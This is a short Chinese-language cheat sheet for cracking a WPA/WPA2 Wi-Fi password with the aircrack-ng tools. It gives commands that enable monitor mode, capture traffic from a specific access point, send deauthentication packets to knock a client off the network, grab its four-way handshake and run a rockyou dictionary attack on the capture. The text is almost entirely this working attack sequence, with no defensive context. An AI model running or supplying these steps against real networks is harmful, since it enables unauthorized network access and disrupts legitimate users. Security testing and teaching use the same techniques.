利用网卡监控模式
监控wifi热点 .然后强制断开用户与路由连接.利用用户与路由四次握手机会获取握手包.然后跑字典
# airmon-ng
# airmon-ng start wlan0
#wlan0为 上一个命令的Interface
# airodump-ng wlan0mon
# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
-c 6:表示信道6 (ch)
# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
# airmon-ng stop wlan0mon
# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
#跑字典